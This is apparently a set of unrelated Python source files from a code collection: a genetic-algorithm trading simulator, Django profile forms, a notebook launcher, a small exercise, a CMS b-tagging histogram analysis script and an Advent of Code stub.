        """Rebuild the population from a file written by save().

        SECURITY(review): pickle.load executes arbitrary code from the file;
        only load files produced by this program.
        """
        with open(file_name, 'rb') as open_handle:
            self.__contained_individuals = []
            num_individuals = int(open_handle.readline())
            self.__num_individuals = num_individuals
            self.__input_shape = pickle.load(open_handle)
            for i in range(num_individuals):
                # Placeholder (1, 1) individuals; their matrices are replaced
                # entirely by the subsequent load() call.
                self.__contained_individuals.append(TradingIndividual((1, 1), 0))
                self.__contained_individuals[-1].load(open_handle)

    def train(self, input_data: np.ndarray, epochs: int, share_prices: List[float]) -> List[float]:
        # note that input_data in this context is a Kxmxn matrix. Where K is the number of examples in the dataset for
        # one stock. It is also assumed that the each mxn matrix is sequentially in order.
        # Meaning that the example paired with July 14 is after the one for July 13, and before the one for July 15.
        # Returns the fitness values of the top three individuals of the
        # final generation.
        if len(self.__contained_individuals) == 0:
            self.__spawn_remaining_population()
        best_fitness = []
        for i in range(epochs):
            # Feed every example (with its matching share price) to every
            # individual, then breed the next generation from the results.
            for j in range(len(input_data)):
                example_data = input_data[j]
                share_price = share_prices[j]
                self.__epoch_iteration(example_data, share_price)
            best_fitness = self.__generate_next_generation()
        return best_fitness

    def predict(self, input_data: np.ndarray) -> np.ndarray:
        """Return a 3x2 array: row i holds the [buy, sell] decisions of
        individual i.

        NOTE(review): indexes the first three individuals; they are
        fitness-sorted only after train() has run at least once.
        """
        ret_predictions = np.zeros((3, 2))
        for i in range(3):
            ret_predictions[i] = self.__contained_individuals[i].predict_data(input_data)
        return ret_predictions

    def __epoch_iteration(self, input_data: np.ndarray, share_price: float):
        # Let every individual react to one example/price pair.
        for individual in self.__contained_individuals:
            individual.handle_data(input_data, share_price)

    def __generate_next_generation(self):
        """Breed the next generation and return the top-3 fitness values."""
        # Rank by realized profit, best first.
        self.__contained_individuals = sorted(self.__contained_individuals,
                                              key=lambda x: x.calculate_fitness(),
                                              reverse=True)
        mutate_pop: List[TradingIndividual] = []
        crossover_pop: List[TradingIndividual] = []
        # Keep the top 10% as-is (elitism).
        kept_pop = self.__contained_individuals[:round(.1 * self.__num_individuals)]
        best_fitness = [x.calculate_fitness() for x in kept_pop[:3]]
        # Clear the keepers' trading state so fitness restarts next epoch.
        for individual in kept_pop:
            individual.reset_starting_state()
        # 30% of the population: mutants of randomly chosen keepers.
        # NOTE(review): round(ranf()*len) - 1 can evaluate to -1, which
        # selects the LAST keeper — the sampling is slightly biased.
        for i in range(round(.3 * self.__num_individuals)):
            selected_individual = kept_pop[round(np.random.ranf() * len(kept_pop)) - 1]
            mutate_pop.append(selected_individual.mutate(self.__mutation_chance, self.__mutation_magnitude))
        # 20% of the population: crossovers of two distinct keepers.
        for i in range(round(.2 * self.__num_individuals)):
            selected_individual_a = kept_pop[round(np.random.ranf() * len(kept_pop)) - 1]
            selected_individual_b = kept_pop[round(np.random.ranf() * len(kept_pop)) - 1]
            while selected_individual_a == selected_individual_b:
                selected_individual_b = kept_pop[round(np.random.ranf() * len(kept_pop)) - 1]
            crossover_pop.append(selected_individual_a.crossover(selected_individual_b, self.__crossover_chance))
        kept_pop.extend(mutate_pop)
        kept_pop.extend(crossover_pop)
        self.__contained_individuals = kept_pop
        # Refill the remaining ~40% with fresh random individuals.
        self.__spawn_remaining_population()
        return best_fitness

    def __spawn_remaining_population(self):
        # Top the population back up to its configured size with newcomers.
        for i in range(self.__num_individuals - len(self.__contained_individuals)):
            self.__contained_individuals.append(TradingIndividual(self.__input_shape, self.__starting_balance))
class TradingIndividual:
    """One evolvable trading strategy: two stacks of random matrices (one for
    buy decisions, one for sell decisions) plus the trading state they drive.
    """

    def __init__(self, input_shape: Tuple[int, int], starting_balance: float):
        # Trading state: how long the current position has been held, cash
        # balance, whether a position is open, and the position details.
        self.__days_share_held = 0
        self.__current_balance = starting_balance
        self.__starting_balance = starting_balance
        self.__transaction_state = False
        # NOTE(review): recorded on buy but never read back in this class.
        self.__held_share_price = 0.0
        self.__num_held_shares = 0
        # The "genome": one matrix pipeline per decision type.
        self.__buy_state_matrices: List[np.ndarray] = []
        self.__sell_state_matrices: List[np.ndarray] = []
        self.__initialize_transaction_matrices(input_shape)
        self.__input_shape = input_shape

    def __initialize_transaction_matrices(self, input_shape: Tuple[int, int]):
        # Initialize transaction matrices with values in the range [-2, 2)
        # With this range, values should neither explode nor degrade during multiplications too badly.
        # Pipeline shapes for an (m, n) input:
        #   reframe (n, m) -> analysis (m, m) -> weighing (m, 2),
        #   then conclusory (1, m) applied on the left (see
        #   __evaluate_transaction) to produce a (1, 2) decision.
        def shift_matrix_factory(shape):
            return np.full(shape, 2)
        self.__buy_state_matrices.clear()
        self.__sell_state_matrices.clear()
        reframe_shape = (input_shape[1], input_shape[0])
        analysis_shape = (input_shape[0], input_shape[0])
        weighing_shape = (input_shape[0], 2)
        conclusory_shape = (1, input_shape[0])
        self.__buy_state_matrices.append((np.random.ranf(reframe_shape) * 4) - shift_matrix_factory(reframe_shape))
        self.__buy_state_matrices.append((np.random.ranf(analysis_shape) * 4) - shift_matrix_factory(analysis_shape))
        self.__buy_state_matrices.append((np.random.ranf(weighing_shape) * 4) - shift_matrix_factory(weighing_shape))
        self.__buy_state_matrices.append(
            (np.random.ranf(conclusory_shape) * 4) - shift_matrix_factory(conclusory_shape))
        self.__sell_state_matrices.append((np.random.ranf(reframe_shape) * 4) - shift_matrix_factory(reframe_shape))
        self.__sell_state_matrices.append((np.random.ranf(analysis_shape) * 4) - shift_matrix_factory(analysis_shape))
        self.__sell_state_matrices.append((np.random.ranf(weighing_shape) * 4) - shift_matrix_factory(weighing_shape))
        self.__sell_state_matrices.append(
            (np.random.ranf(conclusory_shape) * 4) - shift_matrix_factory(conclusory_shape))

    def __mutate_matrix(self, chance_per_genome: float, rate_per_selected: float, matrix: np.ndarray) -> np.ndarray:
        # The current decision is to base the mutation of each genome on the current strength of the genome.
        # This may prevent explosion of values and will be more precise at lower magnitude numbers.
        # This comes at the cost of a loss of precise mutations with higher magnitude numbers.
        # The other option is to set the maximum magnitude of mutation, and have the rate be a multiplier on that.
        # Returns a mutated COPY; the input matrix is left untouched.
        ret_matrix = np.zeros_like(matrix)
        for i in range(matrix.shape[0]):
            for j in range(matrix.shape[1]):
                genome_chance = np.random.ranf()
                if genome_chance < chance_per_genome:
                    # Mutate: nudge by +/- rate_per_selected of current value.
                    genome_chance = np.random.ranf()
                    mutation_magnitude = matrix[i][j] * rate_per_selected
                    if genome_chance < .5:
                        mutation_magnitude *= -1
                    ret_matrix[i][j] = matrix[i][j] + mutation_magnitude
        return ret_matrix

    def __crossover_matrix(self,
                           matrix_a: np.ndarray,
                           matrix_b: np.ndarray,
                           chance_per_genome: float
                           ) -> np.ndarray:
        # Per-element uniform crossover: each cell comes from matrix_a with
        # probability chance_per_genome, otherwise from matrix_b.
        ret_matrix = np.zeros_like(matrix_a)
        for i in range(matrix_a.shape[0]):
            for j in range(matrix_a.shape[1]):
                genome_chance = np.random.ranf()
                if genome_chance < chance_per_genome:
                    ret_matrix[i][j] = matrix_a[i][j]
                else:
                    ret_matrix[i][j] = matrix_b[i][j]
        return ret_matrix

    def mutate(self, chance_per_genome: float, rate_per_selected: float) -> "TradingIndividual":
        """Return a NEW individual whose buy/sell matrices are mutated copies
        of this one's; this individual is unchanged."""
        ret_individual = TradingIndividual(self.__input_shape, self.__starting_balance)
        for i in range(len(self.__buy_state_matrices)):
            matrix = self.__buy_state_matrices[i]
            ret_individual.__buy_state_matrices[i] = self.__mutate_matrix(chance_per_genome, rate_per_selected, matrix)
            matrix = self.__sell_state_matrices[i]
            ret_individual.__sell_state_matrices[i] = self.__mutate_matrix(chance_per_genome, rate_per_selected, matrix)
        return ret_individual

    def reset_starting_state(self):
        """Clear all trading state so the next epoch starts from scratch."""
        self.__current_balance = self.__starting_balance
        self.__transaction_state = False
        self.__held_share_price = 0.0
        self.__num_held_shares = 0

    def crossover(self, other: "TradingIndividual", crossover_chance=.5) -> "TradingIndividual":
        """Return a NEW individual mixing this genome with other's."""
        ret_individual = TradingIndividual(self.__input_shape, self.__starting_balance)
        for i in range(len(self.__buy_state_matrices)):
            matrix_a = self.__buy_state_matrices[i]
            matrix_b = other.__buy_state_matrices[i]
            ret_individual.__buy_state_matrices[i] = self.__crossover_matrix(matrix_a, matrix_b, crossover_chance)
            matrix_a = self.__sell_state_matrices[i]
            matrix_b = other.__sell_state_matrices[i]
            ret_individual.__sell_state_matrices[i] = self.__crossover_matrix(matrix_a, matrix_b, crossover_chance)
        return ret_individual

    def calculate_fitness(self):
        # Fitness is realized profit relative to the starting balance.
        return self.__current_balance - self.__starting_balance

    def __evaluate_transaction(self,
                               input_data: np.ndarray, state_matrices: List[np.ndarray]
                               ) -> np.ndarray:
        # Chain-multiply the input through all but the last matrix, then
        # apply the conclusory matrix on the LEFT, yielding a (1, 2) result.
        evaluation_ret = input_data
        for i in range(len(state_matrices) - 1):
            evaluation_ret = evaluation_ret @ state_matrices[i]
        return state_matrices[-1] @ evaluation_ret

    def handle_data(self, input_data: np.ndarray, share_price: float):
        """Process one example/price pair: decide to sell (if holding) or
        buy (if not) and update balance and position state accordingly."""
        if self.__transaction_state:
            evaluation_result = self.__evaluate_transaction(input_data, self.__sell_state_matrices)
            # Sell when column 0 beats column 1, or force a sale after 5 days.
            if evaluation_result[0][0] > evaluation_result[0][1] or self.__days_share_held == 5:
                # Indicates we should sell current held shares
                self.__current_balance += self.__num_held_shares * share_price
                self.__num_held_shares = 0
                self.__held_share_price = 0
                self.__transaction_state = False
                self.__days_share_held = 0
            else:
                self.__days_share_held += 1
        else:
            evaluation_result = self.__evaluate_transaction(input_data, self.__buy_state_matrices)
            if evaluation_result[0][0] > evaluation_result[0][1]:
                # Indicates we should buy some shares
                # NOTE(review): always buys exactly 100 shares regardless of
                # current balance, so the balance can go negative — confirm
                # this is intended.
                self.__num_held_shares = 100
                self.__current_balance -= self.__num_held_shares * share_price
                self.__held_share_price = share_price
                self.__transaction_state = True

    def predict_data(self, input_data: np.ndarray) -> np.ndarray:
        """Return [buy_flag, sell_flag] for the given input, without
        modifying any trading state."""
        buy_evaluation_result = self.__evaluate_transaction(input_data, self.__buy_state_matrices)
        sell_evaluation_result = self.__evaluate_transaction(input_data, self.__sell_state_matrices)
        return np.array([
            buy_evaluation_result[0][0] > buy_evaluation_result[0][1],
            sell_evaluation_result[0][0] > sell_evaluation_result[0][1]
        ])

    def load(self, file_handle: IO):
        """Replace this individual's matrices and starting balance with the
        next records pickled in file_handle (written by save()).

        SECURITY(review): pickle.load executes arbitrary code from the file;
        only load files produced by this program.
        """
        for i in range(len(self.__buy_state_matrices)):
            self.__buy_state_matrices[i] = pickle.load(file_handle)
        for i in range(len(self.__sell_state_matrices)):
            self.__sell_state_matrices[i] = pickle.load(file_handle)
        self.__starting_balance = pickle.load(file_handle)

    def save(self, file_handle: IO):
        """Pickle the buy matrices, sell matrices, and starting balance, in
        the order load() expects."""
        for mat in self.__buy_state_matrices:
            pickle.dump(mat, file_handle)
        for mat in self.__sell_state_matrices:
            pickle.dump(mat, file_handle)
        pickle.dump(self.__starting_balance, file_handle)
|
993,456 | 8a2db74aa39746e27fca5a8c0ccd7166b9a59135 | from django import forms
from users_profiles.models import UserProfile
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
class UserProfileForm(forms.ModelForm):
    """Edit the news-subscription flag and avatar of a UserProfile."""
    class Meta:
        model = UserProfile
        fields = ('receive_news', 'picture')
#TODO: how to change a user's category from player to developer and vice versa
#TODO: how to determine the category of a user created through the third-party login process
class ShortUserProfileForm(forms.ModelForm):
    """Minimal profile form exposing only the account category."""
    class Meta:
        model = UserProfile
        fields = ('category',)
class UserProfileForm2(forms.ModelForm):
    """Edit basic account fields (names, email) on the auth User model."""
    #password = forms.CharField(widget=forms.PasswordInput())
    #category = forms.ChoiceField(choices=(("Developer", "Developer"),("Gamer", "Gamer")))
    class Meta:
        model = User
        fields = ( 'first_name', 'last_name', 'email',)
993,457 | f7ba58797dab809843107b81c4cfbb9a117508b8 | # coding: utf-8
from __future__ import absolute_import
# import models into model package
from .ane import ANE
from .ane_flow_coefficient import ANEFlowCoefficient
from .error import Error
from .error_meta import ErrorMeta
from .flow_spec import FlowSpec
from .path_query_response import PathQueryResponse
from .query_desc import QueryDesc
from .resource_query_response import ResourceQueryResponse
|
993,458 | be4cf1a3d70e3e692b2daaa186ce64e21cf69f1f | #!/usr/bin/env python
import os
value=os.system("ipython notebook --pylab inline")
# os.system returns the shell exit status; nonzero means the first launch
# failed (e.g. the default port was unavailable), so retry on port 9999.
if value>0:
    value=os.system("ipython notebook --pylab inline --port 9999")
|
993,459 | 56a03e302f1f9d27551000325decd497ec22cea9 | def cigar_party(cigars, is_weekend):
if (cigars >= 40 and cigars <= 60) and not is_weekend:
return True
if (cigars >= 40 and cigars <= 60) and is_weekend:
return True
if (cigars > 60) and is_weekend:
return True
if (cigars < 40 or cigars > 60) and is_weekend:
return False
return False
|
993,460 | 2098f551db4a95ab1f90a16c9bd5bcee1ee19b13 | import optparse
import os,sys
import json
import commands
import ROOT
import pickle
from plotter import Plot
# Opposite-sign dilepton channel codes, encoded as products of lepton PDG
# ids (presumably ee, mumu, emu); events are matched against ttbar_chan.
CHANNELS = [-11*11,-13*13,-11*13]
#CHANNELS = [-11*13]
# Jet multiplicity categories used when building the tag-counting histograms.
JETMULTCATEGS = [2,3,4]
# Bins in the slicing variable: the first entry is the inclusive range, the
# remaining entries are exclusive sub-ranges.
SLICEBINS = [(20,320),(20,60),(60,120),(120,320)]
SLICEVAR = 'jetpt'
# Systematic variations: '' is the nominal, the rest are up/down shifts.
SYSTVARS = ['','jesup','jesdn','jerup','jerdn','trigdn','trigup','seldn','selup','qcdscaledn','qcdscaleup','hdampdn','hdampup']
"""
Project trees from files to build the templates
"""
def prepareTemplates(tagger,taggerDef,inDir,outDir):
print '...starting %s'%tagger
histos={}
nOPs=len(taggerDef)-2
nSliceCategs=(len(SLICEBINS)-1)**2+1
#MC efficiency
for key in ['b','c','l']:
for i in xrange(1,nOPs+1):
name='%s_%s_pass%d'%(key,tagger,i-1)
histos[name]=ROOT.TH1F(name,';%s slice bin;Events'%SLICEVAR,len(SLICEBINS),0,len(SLICEBINS))
for xbin in xrange(0,len(SLICEBINS)):
label='%d-%d'%(SLICEBINS[xbin][0],SLICEBINS[xbin][1])
histos[name].GetXaxis().SetBinLabel(xbin+1,label)
#flavour categories
flavourCombinationsBinMap=['l_{1}l_{2}','l_{1}c_{2}','l_{1}b_{2}','c_{1}l_{2}','c_{1}c_{2}','c_{1}b_{2}','b_{1}l_{2}','b_{1}c_{2}','b_{1}b_{2}']
jetCategsBinMap=[]
j1slice,j2slice=1,1
for islice in xrange(0,nSliceCategs):
j1Cuts,j2Cuts=SLICEBINS[0],SLICEBINS[0]
if islice>0:
if j2slice==len(SLICEBINS):
j2slice=1
j1slice+=1
j1Cuts,j2Cuts=SLICEBINS[j1slice],SLICEBINS[j2slice]
j2slice+=1
if j1Cuts[0]<j2Cuts[0]:continue
jetCategsBinMap.append( (j1Cuts,j2Cuts) )
histos['flavcategs']=ROOT.TH2F('flavcategs',';Slice category;Flavour combination',
len(jetCategsBinMap),0,len(jetCategsBinMap),9,0,9)
for xbin in xrange(0,len(jetCategsBinMap)):
j1Cuts,j2Cuts=jetCategsBinMap[xbin][0],jetCategsBinMap[xbin][1]
label='(%d-%d),(%d-%d)'%(j1Cuts[0],j1Cuts[1],j2Cuts[0],j2Cuts[1])
histos['flavcategs'].GetXaxis().SetBinLabel(xbin+1,label)
for ybin in xrange(0,len(flavourCombinationsBinMap)):
histos['flavcategs'].GetYaxis().SetBinLabel(ybin+1,flavourCombinationsBinMap[ybin])
#tag counting in categories
tagCountingBinMap=[]
nJetMultCategs=len(JETMULTCATEGS)
j1slice,j2slice=1,1
for islice in xrange(0,nSliceCategs):
j1Cuts,j2Cuts=SLICEBINS[0],SLICEBINS[0]
if islice>0:
if j2slice==len(SLICEBINS):
j2slice=1
j1slice+=1
j1Cuts,j2Cuts=SLICEBINS[j1slice],SLICEBINS[j2slice]
j2slice+=1
if j1Cuts[0]<j2Cuts[0]:continue
for ij in xrange(0,nJetMultCategs):
jmult=JETMULTCATEGS[ij]
for bmult in xrange(0,3):
tagCountingBinMap.append( (bmult,jmult,j1Cuts,j2Cuts) )
print len(tagCountingBinMap),' bins for tag counting...have fun with that'
for key in ['data','hh','hl','ll']:
for i in xrange(1,nOPs):
name='%s_%s_pass%d'%(key,tagger,i)
histos[name]=ROOT.TH1F(name,';%s b-tag multiplicity;Events'%taggerDef[0],len(tagCountingBinMap),0,len(tagCountingBinMap))
curJetMult=tagCountingBinMap[0][1]
curJ1Cut=tagCountingBinMap[0][2]
curJ2Cut=tagCountingBinMap[0][3]
for xbin in xrange(1,len(tagCountingBinMap)+1):
bmult=tagCountingBinMap[xbin-1][0]
jmult=tagCountingBinMap[xbin-1][1]
j1cut=tagCountingBinMap[xbin-1][2]
j2cut=tagCountingBinMap[xbin-1][3]
printJetMult=False
if xbin==1 or jmult!=curJetMult:
printJetMult=True
curJetMult=jmult
printJetCuts=False
if xbin==1 or j1cut!=curJ1Cut or j2cut!=curJ2Cut:
printJetCuts=True
curJ1Cut=j1cut
curJ2Cut=j2cut
label='%dt'%bmult
if printJetMult : label += ',%dj'%jmult
if printJetCuts : label='#splitline{%s}{(%d-%d),(%d-%d)}'%(label,j1cut[0],j1cut[1],j2cut[0],j2cut[1])
histos[name].GetXaxis().SetBinLabel(xbin,label)
#add files to the corresponding chains
files = [ f for f in os.listdir(inDir) if '.root' in f ]
chains={'mc':ROOT.TChain('ftm'),'data':ROOT.TChain('ftm')}
for f in files:
key = 'mc' if 'MC' in f else 'data'
chains[key].Add(inDir+'/'+f)
#fill histos
for key in chains:
totalEntries=chains[key].GetEntries()
for i in xrange(0,totalEntries):
if i%100==0 : sys.stdout.write('\r [ %d/100 ] done for %s' %(int(float(100.*i)/float(totalEntries)),key) )
chains[key].GetEntry(i)
#require matching channel
if not chains[key].ttbar_chan in CHANNELS : continue
#require at least two jets
if not chains[key].jetmult in JETMULTCATEGS : continue
#event weight
weight=chains[key].weight[0]
ntags=[0]*nOPs
nheavy=0
flavourCombLabel=''
for ij in xrange(0,2):
#tagger value
taggerVal = getattr(chains[key],tagger)[ij]
#count tags
passTagWgts=[False]*nOPs
for iop in xrange(1,nOPs):
if taggerVal<taggerDef[iop+1]: continue
passTagWgts[iop-1]=True
ntags[iop-1]+=1
#MC truth
flavName='l'
if abs(chains[key].flavour[ij])==5 :
nheavy +=1
flavName='b'
if abs(chains[key].flavour[ij])==4:
nheavy+=1
flavName='c'
#MC truth for the efficiency as function of the slicing variable
flavourCombLabel += '%s_{%d}'%(flavName,ij+1)
jetSliceVarVal=getattr(chains[key],SLICEVAR)[ij]
for ijcat in xrange(0,len(SLICEBINS)):
if jetSliceVarVal<SLICEBINS[ijcat][0] : continue
if jetSliceVarVal>SLICEBINS[ijcat][1] : continue
histos['%s_%s_pass0'%(flavName,tagger)].Fill(ijcat,weight)
for iop in xrange(1,nOPs):
if not passTagWgts[iop-1] : continue
name='%s_%s_pass%d'%(flavName,tagger,iop)
histos[name].Fill(ijcat,weight)
#MC truth for the jet flavour combination vs jet slicing category
if key !='data':
for iflavComb in xrange(0,len(flavourCombinationsBinMap)):
if flavourCombLabel!= flavourCombinationsBinMap[iflavComb] : continue
for ijetCateg in xrange(0,len(jetCategsBinMap)):
j1Cuts=jetCategsBinMap[ijetCateg][0]
j1SliceVarVal=getattr(chains[key],SLICEVAR)[0]
if j1SliceVarVal<j1Cuts[0] or j1SliceVarVal>j1Cuts[1] : continue
j2Cuts=jetCategsBinMap[ijetCateg][1]
j2SliceVarVal=getattr(chains[key],SLICEVAR)[1]
if j2SliceVarVal<j2Cuts[0] or j2SliceVarVal>j2Cuts[1] : continue
histos['flavcategs'].Fill(ijetCateg,iflavComb,weight)
#tag counting histograms
flavCat=key
if key != 'data' :
flavCat='hh'
if nheavy==1: flavCat='hl'
if nheavy==0: flavCat='ll'
for ibin in xrange(0,len(tagCountingBinMap)):
if chains[key].jetmult != tagCountingBinMap[ibin][1] : continue
j1Cuts=tagCountingBinMap[ibin][2]
j1SliceVarVal=getattr(chains[key],SLICEVAR)[0]
if j1SliceVarVal<j1Cuts[0] or j1SliceVarVal>j1Cuts[1] : continue
j2Cuts=tagCountingBinMap[ibin][3]
j2SliceVarVal=getattr(chains[key],SLICEVAR)[1]
if j2SliceVarVal<j2Cuts[0] or j2SliceVarVal>j2Cuts[1] : continue
for iop in xrange(1,nOPs):
if ntags[iop-1]!=tagCountingBinMap[ibin][0] : continue
name='%s_%s_pass%d'%(flavCat,tagger,iop)
histos[name].Fill(ibin,weight)
#save templates to file
fOut=ROOT.TFile.Open('%s/FtM/%s.root'%(outDir,tagger),'RECREATE')
for key in histos : histos[key].Write()
fOut.Close()
"""
Wrapper to be used when run in parallel
"""
def runPrepareTemplatesPacked(args):
tagger, taggerDef, inDir, outDir = args
try:
return prepareTemplates(tagger=tagger,
taggerDef=taggerDef,
inDir=inDir,
outDir=outDir)
except :
print 50*'<'
print " Problem found (%s) baling out of this task" % sys.exc_info()[1]
print 50*'<'
return False
"""
Use the templates to prepare the workspace
"""
def prepareWorkspace(tagger,taggerDef,inDir):
inF=ROOT.TFile.Open('%s/%s.root'%(inDir,tagger))
colors = [ROOT.kGray, ROOT.kAzure+7, ROOT.kGreen,
ROOT.kGreen+1, ROOT.kOrange+8, ROOT.kMagenta+2,
ROOT.kYellow-3, ROOT.kYellow-5, 0]
#
#MC EFFICIENCIES
#
effGrs={}
for flav in ['b','c','l']:
preTag=inF.Get('%s_%s_pass0' % (flav,tagger) )
if not flav in effGrs: effGrs[flav]=[]
for iop in xrange(1,len(taggerDef)-2):
postTag=inF.Get('%s_%s_pass%d' % (flav,tagger,iop) )
effGrs[flav].append( postTag.Clone() )
effGrs[flav][-1].Sumw2()
effGrs[flav][-1].SetTitle('%s>%3.2f' % (tagger,taggerDef[iop+2] ))
effGrs[flav][-1].SetMarkerStyle(20+iop)
effGrs[flav][-1].SetMarkerColor(colors[iop])
effGrs[flav][-1].SetLineColor(colors[iop])
effGrs[flav][-1].SetFillStyle(0)
effGrs[flav][-1].Divide(preTag)
#
#FLAVOUR COMPOSITION
#
flavcategs=inF.Get('flavcategs')
catFracHistos=[]
for xbin in xrange(1,flavcategs.GetNbinsX()+1):
xlabel = flavcategs.GetXaxis().GetBinLabel(xbin)
totalInCat = flavcategs.Integral(xbin,xbin,1,flavcategs.GetNbinsY())
for ybin in xrange(1,flavcategs.GetNbinsY()+1):
ylabel=flavcategs.GetYaxis().GetBinLabel(ybin)
#init histo if not yet available
if len(catFracHistos)<ybin:
catFracHistos.append( ROOT.TH1F('catfrac%d'%ybin,
'%s;%s;Fraction' %(ylabel,flavcategs.GetTitle()),
flavcategs.GetNbinsX(),flavcategs.GetXaxis().GetXmin(),flavcategs.GetXaxis().GetXmax()))
catFracHistos[-1].SetTitle(ylabel)
catFracHistos[-1].SetDirectory(0)
catFracHistos[-1].Sumw2()
catFracHistos[-1].SetLineColor(1)
catFracHistos[-1].SetFillColor(colors[ybin-1])
catFracHistos[-1].SetMarkerColor(colors[ybin-1])
catFracHistos[-1].SetFillStyle(1001)
for binCtr in xrange(1, catFracHistos[-1].GetNbinsX()+1):
catFracHistos[-1].GetXaxis().SetBinLabel(binCtr,flavcategs.GetXaxis().GetBinLabel(xbin))
catFracHistos[ybin-1].SetBinContent(xbin,flavcategs.GetBinContent(xbin,ybin)/totalInCat)
catFracHistos[ybin-1].SetBinError(xbin,flavcategs.GetBinError(xbin,ybin)/totalInCat)
#SHOW PLOTS
ceff=ROOT.TCanvas('ceff','ceff',500,500)
ceff.SetTopMargin(0)
ceff.SetBottomMargin(0)
ceff.SetLeftMargin(0)
ceff.SetRightMargin(0)
txt=ROOT.TLatex()
txt.SetNDC(True)
txt.SetTextFont(43)
txt.SetTextSize(16)
txt.SetTextAlign(12)
ceff.cd()
p1=ROOT.TPad('p1','p1',0.,0.,1.0,0.33)
p1.SetBottomMargin(0.15)
p1.SetTopMargin(0.01)
p1.SetLeftMargin(0.12)
p1.SetRightMargin(0.05)
p1.Draw()
p1.cd()
for i in xrange(0,len(effGrs['b'])):
drawOpt='E1X0' if i==0 else 'E1X0same'
effGrs['b'][i].Draw(drawOpt)
effGrs['b'][i].GetXaxis().SetTitleSize(0.9)
effGrs['b'][i].GetXaxis().SetLabelSize(0.08)
effGrs['b'][i].GetYaxis().SetRangeUser(0.12,0.96)
effGrs['b'][i].GetYaxis().SetTitleSize(0.09)
effGrs['b'][i].GetYaxis().SetLabelSize(0.08)
effGrs['b'][i].GetYaxis().SetTitle('Efficiency')
effGrs['b'][i].GetYaxis().SetTitleOffset(0.6)
txt.DrawLatex(0.85,0.93,'#bf{[b]}')
ceff.cd()
p2=ROOT.TPad('p2','p2',0.,0.33,1.0,0.66)
p2.SetBottomMargin(0.01)
p2.SetTopMargin(0.01)
p2.SetLeftMargin(0.12)
p2.SetRightMargin(0.05)
p2.Draw()
p2.cd()
for i in xrange(0,len(effGrs['c'])):
drawOpt='E1X0' if i==0 else 'E1X0same'
effGrs['c'][i].Draw(drawOpt)
effGrs['c'][i].GetYaxis().SetRangeUser(0.12,0.96)
effGrs['c'][i].GetYaxis().SetTitleSize(0.09)
effGrs['c'][i].GetYaxis().SetLabelSize(0.08)
effGrs['c'][i].GetYaxis().SetTitle('Efficiency')
effGrs['c'][i].GetYaxis().SetTitleOffset(0.6)
txt.DrawLatex(0.85,0.93,'#bf{[c]}')
ceff.cd()
p3=ROOT.TPad('p3','p3',0.,0.66,1.0,1.0)
p3.SetBottomMargin(0.01)
p3.SetTopMargin(0.02)
p3.SetLeftMargin(0.12)
p3.SetRightMargin(0.05)
p3.Draw()
p3.cd()
leg=ROOT.TLegend(0.2,0.75,0.8,0.9)
leg.SetBorderSize(0)
leg.SetFillStyle(0)
leg.SetTextFont(42)
leg.SetNColumns(4)
leg.SetTextSize(0.06)
for i in xrange(0,len(effGrs['l'])):
drawOpt='E1X0' if i==0 else 'E1X0same'
effGrs['l'][i].Draw(drawOpt)
effGrs['l'][i].GetYaxis().SetRangeUser(0.12,0.96)
effGrs['l'][i].GetYaxis().SetTitleSize(0.09)
effGrs['l'][i].GetYaxis().SetLabelSize(0.08)
effGrs['l'][i].GetYaxis().SetTitle('Efficiency')
effGrs['l'][i].GetYaxis().SetTitleOffset(0.6)
leg.AddEntry(effGrs['l'][i],effGrs['l'][i].GetTitle(),'p')
leg.Draw()
txt.DrawLatex(0.9,0.93,'#bf{[l]}')
txt.DrawLatex(0.2,0.93,'#bf{CMS} #it{Simulation}')
ceff.cd()
ceff.Modified()
ceff.Update()
raw_input()
c=ROOT.TCanvas('c','c',500,500)
c.SetTopMargin(0.02)
c.SetRightMargin(0.1)
c.SetLeftMargin(0.12)
c.SetBottomMargin(0.15)
leg=ROOT.TLegend(0.2,0.75,0.8,0.9)
leg.SetBorderSize(0)
leg.SetFillStyle(0)
leg.SetTextFont(42)
leg.SetNColumns(4)
leg.SetTextSize(0.04)
stack=ROOT.THStack()
for h in catFracHistos:
stack.Add(h,'h')
leg.AddEntry(h,h.GetTitle(),'f')
stack.Draw('hist')
stack.GetYaxis().SetTitle('Fraction')
stack.GetXaxis().SetTitle('%s category'%SLICEVAR)
stack.GetXaxis().SetTitleOffset(2)
stack.GetYaxis().SetRangeUser(0,1)
leg.Draw()
txt=ROOT.TLatex()
txt.SetNDC(True)
txt.SetTextFont(43)
txt.SetTextSize(16)
txt.SetTextAlign(12)
txt.DrawLatex(0.2,0.93,'#bf{CMS} #it{Simulation}')
raw_input()
"""
steer the script
"""
def main():
ROOT.gStyle.SetOptStat(0)
ROOT.gStyle.SetOptTitle(0)
#ROOT.gROOT.SetBatch(True)
#configuration
usage = 'usage: %prog [options]'
parser = optparse.OptionParser(usage)
parser.add_option('-t', '--taggers', dest='taggers' , help='json with list of taggers', default=None, type='string')
parser.add_option('-i', '--inDir', dest='inDir', help='input directory with files', default=None, type='string')
parser.add_option('-l', '--lumi', dest='lumi' , help='lumi to print out', default=41.6, type=float)
parser.add_option('-n', '--njobs', dest='njobs', help='# jobs to run in parallel', default=0, type='int')
parser.add_option('-o', '--outDir', dest='outDir', help='output directory', default='analysis', type='string')
parser.add_option( '--recycleTemplates', dest='recycleTemplates', help='do not regenerate templates', default=False, action='store_true')
(opt, args) = parser.parse_args()
#read list of samples
taggersFile = open(opt.taggers,'r')
taggersList=json.load(taggersFile,encoding='utf-8').items()
taggersFile.close()
#re-create templates
if not opt.recycleTemplates:
task_list=[]
os.system('mkdir -p %s/FtM'%(opt.outDir))
for tagger,taggerDef in taggersList:
task_list.append((tagger,taggerDef,opt.inDir,opt.outDir))
print '%s jobs to run in %d parallel threads' % (len(task_list), opt.njobs)
if opt.njobs == 0:
for tagger,taggerDef,inDir,outDir in task_list:
prepareTemplates(tagger=tagger,
taggerDef=taggerDef,
inDir=inDir,
outDir=outDir)
else:
from multiprocessing import Pool
pool = Pool(opt.njobs)
pool.map(runPrepareTemplatesPacked, task_list)
#prepare workspace
for tagger,taggerDef in taggersList:
prepareWorkspace(tagger=tagger,taggerDef=taggerDef,inDir=opt.outDir+'/FtM')
#all done here
exit(0)
"""
for execution from another script
"""
if __name__ == "__main__":
sys.exit(main())
|
993,461 | 62f6afaa756ce364ca6fb8edc02181602fa8e376 | # https://adventofcode.com/2018/day/4
import re
from datetime import date, time, timedelta
# Sentinel action codes yielded by read_input: negative so they can never
# collide with a (positive) guard id.
SLEEP = -1
AWAKE = -2
def read_input(fn):
